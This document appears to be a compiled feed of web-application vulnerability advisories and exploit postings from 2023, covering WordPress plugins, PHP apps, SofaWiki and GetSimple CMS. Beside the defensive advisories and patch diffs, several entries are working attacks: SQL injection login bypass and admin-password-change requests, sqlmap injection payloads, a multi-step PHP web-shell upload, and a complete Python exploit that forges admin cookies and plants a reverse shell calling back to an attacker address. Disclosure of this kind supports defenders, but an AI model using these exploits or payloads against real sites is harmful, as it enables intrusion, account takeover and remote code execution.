WordPress Beautiful Cookie Consent Banner versions 2.10.1 and below suffer from an unauthenticated persistent cross site scripting vulnerability.

    Description: Beautiful Cookie Consent Banner <= 2.10.1 - Unauthenticated Stored Cross-Site Scripting Affected Plugin:Beautiful Cookie Consent BannerPlugin Slug: beautiful-and-responsive-cookie-consentAffected Versions: <= 2.10.1CVE ID: Not AssignedCVSS Score: 7.2 (High)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:NResearcher/s: UnknownFully Patched Version: 2.10.2The Beautiful Cookie Consent Banner for WordPress is vulnerable to Stored Cross-Site Scripting via the 'nsc_bar_content_href' parameter in versions up to, and including, 2.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. A partial patch was made available in 2.10.1 and the issue was fully patched in 2.10.2.The AttacksAccording to our records, the vulnerability has been actively attacked since February 5, 2023, but this is the largest attack against it that we have seen. We have blocked nearly 3 million attacks against more than 1.5 million sites, from nearly 14,000 IP addresses since May 23, 2023, and attacks are ongoing.Cookie consent attacks chart Pictured: A chart showing sites attacked and total attacks targeting this vulnerabilityWe believe that this is the work of a single actor, as every single attack contained a partial payload of onmouseenter=" and no further functioning JavaScript. It is likely that this set of attacks is being performed using a misconfigured exploit that expects a customized payload, and that the attacker has simply failed to provide one.Despite this fact, if your website is running a vulnerable version of the plugin and you are not currently using Wordfence or another Web Application Firewall, these attacks do have the potential to corrupt the configuration of the plugin which can break its intended functionality, so we still recommend updating to the latest version, which is 2.13.0 at the time of this writing, as soon as possible.Indicators of CompromiseRequestsexample request An example request showing the payload being usedPOST requests to /wp-admin/admin-post.php from unrecognized IP addresses may appear in your server logs, or in your Live Traffic if you have the Wordfence plugin installed.IP AddressesWe have included the top 20 attacking IP addresses, though there are many more:- 209.126.12.142- 101.34.223.139- 92.204.37.157- 66.37.4.138- 92.205.48.232- 212.237.233.32- 195.201.82.166- 67.205.58.212- 51.38.27.102- 173.236.213.148- 207.244.241.230- 74.208.177.185- 92.204.33.117- 134.119.0.186- 5.9.238.21- 92.205.64.149- 94.158.149.174- 173.236.215.161- 92.205.48.177- 190.54.62.76If your site was impacted by this or an earlier attack campaign, it may have corrupted the ​​nsc_bar_bannersettings_json option in your database. The plugin's developers have included functionality in patched versions to repair any changes made as a result of this exploit.ConclusionIn today’s article, we covered an uptick in attacks targeting a patched vulnerability in Beautiful Cookie Consent Banner.All Wordfence sites, including those running Wordfence Free, Wordfence Premium, Wordfence Care, and Wordfence Response, are protected against this vulnerability by the Wordfence Firewall’s Built-in Cross-Site Scripting protection.However, if you have friends or colleagues running this plugin, please forward this advisory to them - while the current wave of attacks does not contain a malicious payload, the attacker behind this is targeting a large list of sites and has significant resources available to them, and it would be simple for them to update their exploit configuration with a viable malicious payload.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard.

WordPress Beautiful Cookie Consent Banner 2.10.1 Cross Site Scripting

2023 Online Course Registration version 1.0 suffers from a remote SQL Injection vulnerability that allows for authentication bypass.

    ## Title: 2023-Online-Course-Registration-1.0-Bypass-login-SQLi-RCE-password-changing## Author: nu11secur1ty## Date: 05.25.2023## Vendor: https://github.com/nikhilkeshava## Software: https://github.com/nikhilkeshava/online-course-registration-## Reference: https://portswigger.net/web-security/sql-injection,https://portswigger.net/web-security/sql-injection/lab-login-bypass## Description:The `username` parameter appears to be vulnerable to SQL injectionattacks. The payloads 77834251' or 6127=6127-- and 98762777' or4535=4542-- were each submitted in the username parameter. These tworequests resulted in different responses, indicating that the input isunsafely incorporated into a SQL query. The attacker can use thisbypass login vulnerability to send a remote POST request to set a newadministrator password for himself, which is absolutely nasty.STATUS: HIGH Vulnerability[+]Payload:```POSTPOST /online-course-registration/admin/index.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 62Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closeusername=nu11secur1ty%27+or+1%3D1%23&password=password&submit=```[+]Exploit:```POSTPOST /online-course-registration/admin/change-password.php HTTP/1.1Host: pwnedhost.comCookie: PHPSESSID=38468sipptm9j24j9e8svavpgnContent-Length: 58Cache-Control: max-age=0Sec-Ch-Ua: "Chromium";v="113", "Not-A.Brand";v="24"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "Windows"Upgrade-Insecure-Requests: 1Origin: https://pwnedhost.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://pwnedhost.com/online-course-registration/admin/change-password.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closecpass=password&newpass=password5&cnfpass=password5&submit=```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/nikhilkeshava/2023-Online-Course-Registration-1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/05/2023-online-course-registration-10.html)## Time spend:01:15:00

2023 Online Course Registration 1.0 SQL Injection

Service Provider Management System version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Service Provider Management System v1.0 - SQL Injection# Date: 2023-05-23# Exploit Author: Ashik Kunjumon# Vendor Homepage: https://www.sourcecodester.com/users/lewa# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html# Version: 1.0# Tested on: Windows/Linux1. Description:Service Provider Management System v1.0 allows SQL Injection via IDparameter in /php-spms/?page=services/view&id=2Exploiting this issue could allow an attacker to compromise theapplication, access or modify data,or exploit the latest vulnerabilities in the underlying database.Endpoint: /php-spms/?page=services/view&id=2Vulnerable parameter: id (GET)2. Proof of Concept:----------------------Step 1 - By visiting the url:http://localhost/php-spms/?page=services/view&id=2 just add single quote toverify the SQL Injection.Step 2 - Run sqlmap -u " http://localhost/php-spms/?page=services/view&id=2"-p id --dbms=mysqlSQLMap Response:----------------------Parameter: id (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUPBY clause (FLOOR)    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECTCOUNT(*),CONCAT(0x7178717171,(SELECT(ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=services/view&id=1' AND (SELECT 1072 FROM(SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT

Service Provider Management System 1.0 SQL Injection

A vulnerability, which was classified as problematic, was found in PHPOK 6.4.100. This affects an unknown part of the file /admin.php?c=upload&f=zip&_noCache=0.1683794968. The manipulation leads to unrestricted upload. It is possible to initiate the attack remotely. The identifier VDB-229953 was assigned to this vulnerability.

CVE-2023-2888

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.1. This is due to insufficient verification on the user being supplied during the cart sync from mobile REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

CVE-2023-2734: flutter-woo.php in mstore-api/tags/3.9.0/controllers – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.0. This is due to insufficient verification on the user being supplied during the coupon redemption REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

**mstore-api/trunk/controllers/flutter-user.php**

r2910707

r2913397

 

215

215

                'methods' => 'GET',

216

216

                'callback' => array($this, 'check\_user'),

217

 

                'permission\_callback' => function () {

218

 

                    return parent::checkApiPermission();

219

 

                }

220

 

            ),

221

 

        ));

222

 

223

 

        register\_rest\_route($this->namespace, '/test\_push\_notification', array(

224

 

            array(

225

 

                'methods' => 'POST',

226

 

                'callback' => array($this, 'test\_push\_notification'),

227

 

                'permission\_callback' => function () {

228

 

                    return parent::checkApiPermission();

229

 

                }

230

 

            ),

231

 

        ));

232

 

233

 

        register\_rest\_route($this->namespace, '/test\_push\_notification\_created\_order', array(

234

 

            array(

235

 

                'methods' => 'POST',

236

 

                'callback' => array($this, 'test\_push\_notification\_created\_order'),

237

217

                'permission\_callback' => function () {

238

218

                    return parent::checkApiPermission();

…

…

 

1194

1174

    }

1195

1175

1196

 

    public function test\_push\_notification()

1197

 

    {

1198

 

        $json = file\_get\_contents('php://input');

1199

 

        $params = json\_decode($json);

1200

 

        $email = $params->email;

1201

 

        $is\_manager = $params->is\_manager;

1202

 

        $is\_delivery = $params->is\_delivery;

1203

 

        $user = get\_user\_by('email', $email);

1204

 

        $user\_id = $user->ID;

1205

 

        $serverKey = get\_option("mstore\_firebase\_server\_key");

1206

 

        $status = false;

1207

 

        $is\_onesignal = $params->is\_onesignal;

1208

 

        if($is\_onesignal){

1209

 

            $status = one\_signal\_push\_notification("Fluxstore", "Test push notification", array($user\_id));

1210

 

            return \['status' => $status\];

1211

 

        }

1212

 

        if (isset($is\_manager)) {

1213

 

            if ($is\_manager) {

1214

 

                $deviceToken = get\_user\_meta($user\_id, 'mstore\_manager\_device\_token', true);

1215

 

                if ($deviceToken) {

1216

 

                    $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1217

 

                }

1218

 

            }

1219

 

            return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1220

 

        }

1221

 

        if (isset($is\_delivery)) {

1222

 

            if ($is\_delivery) {

1223

 

                $deviceToken = get\_user\_meta($user\_id, 'mstore\_delivery\_device\_token', true);

1224

 

                if ($deviceToken) {

1225

 

                    $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1226

 

                }

1227

 

            }

1228

 

            return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1229

 

        }

1230

 

        $deviceToken = get\_user\_meta($user\_id, 'mstore\_device\_token', true);

1231

 

        if ($deviceToken) {

1232

 

            $status = pushNotification("Fluxstore", "Test push notification", $deviceToken);

1233

 

        }

1234

 

        return \["deviceToken" => $deviceToken, 'serverKey' => $serverKey, 'status' => $status\];

1235

 

    }

1236

 

1237

 

    function test\_push\_notification\_created\_order(){

1238

 

        $json = file\_get\_contents('php://input');

1239

 

        $params = json\_decode($json);

1240

 

        return trackNewOrder($params->order\_id);

1241

 

    }

1242

 

1243

1176

    function chat\_notification()

1244

1177

    {

**mstore-api/trunk/controllers/flutter-woo.php**

r2910707

r2913397

 

743

743

        }

744

744

745

 

        if (isset($body\["customer\_id"\]) && $body\["customer\_id"\] != null) {

746

 

            $userId = $body\["customer\_id"\];

747

 

            $user = get\_userdata($userId);

748

 

            if ($user) {

749

 

                wp\_set\_current\_user($userId, $user->user\_login);

750

 

                wp\_set\_auth\_cookie($userId);

751

 

                WC()->customer = new WC\_Customer($userId, true);

752

 

            }

 

745

        $cookie = $request->get\_header("User-Cookie");

 

746

        if (isset($cookie) && $cookie != null) {

 

747

            $user\_id = validateCookieLogin($cookie);

 

748

            if (is\_wp\_error($user\_id)) {

 

749

                return $user\_id;

 

750

            }

 

751

            wp\_set\_current\_user($user\_id);

 

752

            wp\_set\_auth\_cookie($user\_id);

 

753

            WC()->customer = new WC\_Customer($user\_id, true);

753

754

        }

754

755

**mstore-api/trunk/functions/index.php**

r2910707

r2913397

 

113

113

114

114

    if (isset($deviceToken) && $deviceToken != false) {

115

 

        pushNotification($title, $message, $deviceToken);

116

 

    }

117

 

    one\_signal\_push\_notification($title,$message,array($userId));

 

115

        \_pushNotificationFirebase($userId,$title, $message, $deviceToken);

 

116

    }

 

117

    \_pushNotificationOneSignal($userId, $title,$message);

118

118

}

119

119

…

…

 

142

142

            $result = $wpdb->get\_results($sql);

143

143

144

 

            $user\_ids = array();

145

144

            foreach ($result as $item) {

146

 

                $user\_ids\[\]=$item->delivery\_boy;

147

145

                $deviceToken = get\_user\_meta($item->delivery\_boy, 'mstore\_delivery\_device\_token', true);

148

146

                if (isset($deviceToken) && $deviceToken != false) {

149

 

                    pushNotification($title, $message, $deviceToken);

 

147

                    \_pushNotificationFirebase($item->delivery\_boy,$title, $message, $deviceToken);

150

148

                }

151

 

            }

152

 

            one\_signal\_push\_notification($title,$message, $user\_ids);

 

149

                \_pushNotificationOneSignal($title,$message, $item->delivery\_boy);

 

150

            }

153

151

        }

154

152

…

…

 

176

174

            $deviceToken = get\_user\_meta($driver\_id, 'mstore\_delivery\_device\_token', true);

177

175

            if (isset($deviceToken) && $deviceToken != false) {

178

 

                pushNotification($title, $message, $deviceToken);

 

176

                \_pushNotificationFirebase($driver\_id,$title, $message, $deviceToken);

179

177

                $wpdb->insert($table\_name, array(

180

178

                    'message' => $message,

…

…

 

202

200

    $deviceToken = get\_user\_meta($order\_seller\_id, 'mstore\_device\_token', true);

203

201

    if (isset($deviceToken) && $deviceToken != false) {

204

 

        pushNotification($title, $message, $deviceToken);

 

202

        \_pushNotificationFirebase($order\_seller\_id,$title, $message, $deviceToken);

205

203

    }

206

204

    $managerDeviceToken = get\_user\_meta($order\_seller\_id, 'mstore\_manager\_device\_token', true);

207

205

    if (isset($managerDeviceToken) && $managerDeviceToken != false) {

208

 

        pushNotification($title, $message, $managerDeviceToken);

 

206

        \_pushNotificationFirebase($order\_seller\_id,$title, $message, $managerDeviceToken);

209

207

        if (is\_plugin\_active('wc-multivendor-marketplace/wc-multivendor-marketplace.php')) {

210

208

            wcfm\_message\_on\_new\_order($order\_id);

211

209

        }

212

210

    }

213

 

    one\_signal\_push\_notification($title, $message, array($order\_seller\_id));

 

211

    \_pushNotificationOneSignal($order\_seller\_id,$title, $message);

214

212

}

215

213

…

…

 

611

609

        $managerDeviceToken = get\_user\_meta($seller\_id, 'mstore\_manager\_device\_token', true);

612

610

        if (isset($managerDeviceToken) && $managerDeviceToken != false) {

613

 

            pushNotification($title, $message, $managerDeviceToken);

614

 

        }

615

 

        one\_signal\_push\_notification($title, $message, array($seller\_id));

616

 

    }

 

611

            \_pushNotificationFirebase($seller\_id, $title, $message, $managerDeviceToken);

 

612

        }

 

613

        \_pushNotificationOneSignal($seller\_id,$title, $message);

 

614

    }

 

615

}

 

616

 

617

function \_pushNotificationFirebase($user\_id, $title, $message, $deviceToken){

 

618

    $is\_on = isNotificationEnabled($user\_id);

 

619

    if($is\_on){

 

620

        pushNotification($title, $message, $deviceToken);

 

621

    }

 

622

}

 

623

 

624

function \_pushNotificationOneSignal($user\_id, $title, $message){

 

625

    $is\_on = isNotificationEnabled($user\_id);

 

626

    if($is\_on){

 

627

        one\_signal\_push\_notification($title,$message,array($userId));

 

628

    }

 

629

}

 

630

 

631

function isNotificationEnabled($user\_id){

 

632

    $is\_on = get\_user\_meta($user\_id, "mstore\_notification\_status", true);

 

633

    return  $is\_on === "" || $is\_on === "on";

617

634

}

618

635

?>

**mstore-api/trunk/mstore-api.php**

r2910707

r2913397

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.0

 

6

 \* Version: 3.9.1

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

37

37

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-wholesale.php";

38

38

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-stripe.php";

 

39

include\_once plugin\_dir\_path(\_\_FILE\_\_) . "controllers/flutter-notification.php";

39

40

40

41

class MstoreCheckOut

41

42

{

42

 

    public $version = '3.9.0';

 

43

    public $version = '3.9.1';

43

44

44

45

    public function \_\_construct()

**mstore-api/trunk/readme.txt**

r2910707

r2913397

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.0

 

6

Stable tag:        3.9.1

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.1 =

 

47

  \* Fix security issue for coupon api

 

48

46

49

\= 3.9.0 =

47

50

  \* Fix to push notification to seller when order created

CVE-2023-2733: Diff [2910707:2913397] for mstore-api – WordPress Plugin Repository

The MStore API plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 3.9.2. This is due to insufficient verification on the user being supplied during the add listing REST API request through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the user id.

**mstore-api/trunk/controllers/listing-rest-api/class.api.fields.php**

r2915729

r2916124

 

381

381

                }

382

382

        ));

383

 

384

 

        register\_rest\_route('wp/v2', '/add-listing', array(

385

 

            'methods' => 'GET',

386

 

            'callback' => array(

387

 

                $this,

388

 

                'add\_listing'

389

 

            ) ,

390

 

            'permission\_callback' => function () {

391

 

                return true;

392

 

            }

393

 

        ));

394

383

       

395

384

        register\_rest\_route('wp/v2', '/get-nearby-listings', array(

…

…

 

1072

1061

            $user = get\_userdata($object\['author'\]);

1073

1062

            return $user->display\_name;

1074

 

        }

1075

 

1076

 

        //-----------------//

1077

 

       

1078

 

1079

 

        public function add\_listing($request)

1080

 

        {

1081

 

            $id = $request\['id'\];

1082

 

            wp\_clear\_auth\_cookie();

1083

 

            wp\_set\_current\_user($id);

1084

 

            wp\_set\_auth\_cookie($id, true);

1085

 

            header("Location: " . $request\['url'\]);

1086

 

            die();

1087

1063

        }

1088

1064

**mstore-api/trunk/mstore-api.php**

r2915729

r2916124

 

4

4

 \* Plugin URI: https://github.com/inspireui/mstore-api

5

5

 \* Description: The MStore API Plugin which is used for the MStore and FluxStore Mobile App

6

 

 \* Version: 3.9.2

 

6

 \* Version: 3.9.3

7

7

 \* Author: InspireUI

8

8

 \* Author URI: https://inspireui.com

…

…

 

41

41

class MstoreCheckOut

42

42

{

43

 

    public $version = '3.9.2';

 

43

    public $version = '3.9.3';

44

44

45

45

    public function \_\_construct()

**mstore-api/trunk/readme.txt**

r2915729

r2916124

 

4

4

Requires at least: 4.4

5

5

Tested up to:      6.0.0

6

 

Stable tag:        3.9.2

 

6

Stable tag:        3.9.3

7

7

License:           GPL-2.0

8

8

License URI:       https://www.gnu.org/licenses/gpl-2.0.html

…

…

 

44

44

45

45

\== Changelog ==

 

46

\= 3.9.3 =

 

47

  \* Fix security issue for listing api

 

48

46

49

\= 3.9.2 =

47

50

  \* Fix security issue for cart api

CVE-2023-2732: Diff [2915729:2916124] for mstore-api – WordPress Plugin Repository

SofaWiki <= 3.8.9 has a file upload vulnerability that leads to command execution.

1.  The PHP file an be uploaded directly by matching referer.

    // index.php
    case 'uploadbigfile':   		if ($user->hasright('upload', '') || stristr($swBaseHrefFolder,$referer))
    							{
    									include 'inc/special/uploadbigfile.php';
    							}
    

    // uploadbigfile.php
    if (isset($_FILES['uploadedfile']) && is_uploaded_file($_FILES['uploadedfile']['tmp_name']))
    {	 
    	 $filename = $_FILES['uploadedfile']['name'];
    	 $newfile = $swRoot.'/site/uploadbig/'.$filename;
    	 move_uploaded_file($_FILES['uploadedfile']['tmp_name'],$newfile);
    	 
    	 $checksum = md5_file($newfile);
    	 if ($checksum == $filename)
    	 {
    		 echo 'upload ok '.$filename;
    	 }
    	 else
    	 {
    		 echo 'checksum error filename '.$filename.' checksum '.$checksum. ' length '.filesize($newfile);
    		 unlink($newfile);
    	 }
    	 
    	 $_FILES = null;
    	 
    	 exit();
    }
    

2.  Send a request package to get checksum.

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 243
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="idontknow"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

3.  Send three request packets using checksum to create a malicious PHP file.

> 1st

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 283
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="checkchunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfiZ05SNBgGM9pnBh--
    

> 2nd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 266
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryk1tApDzIaBAxp9EH
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH
    Content-Disposition: form-data; name="uploadedfile"; filename="edc4325bdef3f7fb70abd0389e85f6d1"
    Content-Type: application/octet-stream
    
    <?php echo system($_REQUEST["cmd"]);?>
    ------WebKitFormBoundaryk1tApDzIaBAxp9EH--
    

> 3rd

    POST /sofawiki-master/index.php?action=uploadbigfile HTTP/1.1
    Host: 172.16.134.41
    Content-Length: 574
    User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfeK0BammsIbqUGBr
    Accept: */*
    Origin: http://172.16.134.41
    Referer: http://172.16.134.41/sofawiki-master/index.php?action=view&name=special:upload-big&lang=en
    Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
    
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="composechunks"
    
    edc4325bdef3f7fb70abd0389e85f6d1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="filename"
    
    evilupload.php
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="comment"
    
    test
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="uploadtime"
    
    1
    ------WebKitFormBoundaryfeK0BammsIbqUGBr
    Content-Disposition: form-data; name="start"
    
    0
    ------WebKitFormBoundaryfeK0BammsIbqUGBr--
    

4.  After uploading a malicious PHP file, arbitrary code can be executed.

CVE-2023-29721: [Vuln]There is a file upload vulnerability that leads to command execution. · Issue #27 · bellenuit/sofawiki

GetSimple CMS version 3.3.16 suffers from a remote shell upload vulnerability.

    # Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)# Data: 18/5/2023# Exploit Author : Youssef Muhammad# Vendor: Get-simple# Software Link:# Version app: 3.3.16# Tested on: linux# CVE: CVE-2022-41544import sysimport hashlibimport reimport requestsfrom xml.etree import ElementTreefrom threading import Threadimport telnetlibpurple = "\033[0;35m"reset = "\033[0m"yellow = "\033[93m"blue = "\033[34m"red = "\033[0;31m"def print_the_banner():    print(purple + ''' CCC V     V EEEE      22   000   22   22      4  4  11  5555 4  4 4  4 C    V     V E        2  2 0  00 2  2 2  2     4  4 111  5    4  4 4  4 C     V   V  EEE  ---   2  0 0 0   2    2  --- 4444  11  555  4444 4444 C      V V   E         2   00  0  2    2          4  11     5    4    4  CCC    V    EEEE     2222  000  2222 2222        4 11l1 555     4    4  '''+ reset)def get_version(target, path):    r = requests.get(f"http://{target}{path}admin/index.php")    match = re.search("jquery.getsimple.js\?v=(.*)\"", r.text)    if match:        version = match.group(1)        if version <= "3.3.16":            print( red + f"[+] the version {version} is vulnrable to CVE-2022-41544")        else:            print ("This is not vulnrable to this CVE")        return version    return Nonedef api_leak(target, path):    r = requests.get(f"http://{target}{path}data/other/authorization.xml")    if r.ok:        tree = ElementTree.fromstring(r.content)        apikey = tree[0].text        print(f"[+] apikey obtained {apikey}")        return apikey    return Nonedef set_cookies(username, version, apikey):    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"    headers = {        'Content-Type':'application/x-www-form-urlencoded',        'Cookie': cookies    }    return headersdef get_csrf_token(target, path, headers):    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)    m = re.search('nonce" type="hidden" value="(.*)"', r.text)    if m:        print("[+] csrf token obtained")        return m.group(1)    return Nonedef upload_shell(target, path, headers, nonce, shell_content):    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"    payload = {        'content': shell_content,        'edited_file': '../shell.php',        'nonce': nonce,        'submitsave': 1    }    try:        response = requests.post(upload_url, headers=headers, data=payload)        if response.status_code == 200:            print("[+] Shell uploaded successfully!")        else:            print("(-) Shell upload failed!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while uploading the shell:", e)def shell_trigger(target, path):    url = f"http://{target}{path}/shell.php"    try:        response = requests.get(url)        if response.status_code == 200:            print("[+] Webshell trigged successfully!")        else:            print("(-) Failed to visit the page!")    except requests.exceptions.RequestException as e:        print("(-) An error occurred while visiting the page:", e)def main():    if len(sys.argv) != 5:        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")        return    target = sys.argv[1]    path = sys.argv[2]    if not path.endswith('/'):        path += '/'    ip, port = sys.argv[3].split(':')    username = sys.argv[4]    shell_content = f"""<?php    $ip = '{ip}';    $port = {port};    $sock = fsockopen($ip, $port);    $proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);    """    version = get_version(target, path)    if not version:        print("(-) could not get version")        return    apikey = api_leak(target, path)    if not apikey:        print("(-) could not get apikey")        return    headers = set_cookies(username, version, apikey)    nonce = get_csrf_token(target, path, headers)    if not nonce:        print("(-) could not get nonce")        return    upload_shell(target, path, headers, nonce, shell_content)    shell_trigger(target, path)if __name__ == '__main__':    print_the_banner()    main()

GetSimple CMS 3.3.16 Shell Upload

thrsrossi Millhouse-Project version 1.414 suffers from a remote shell upload vulnerability.

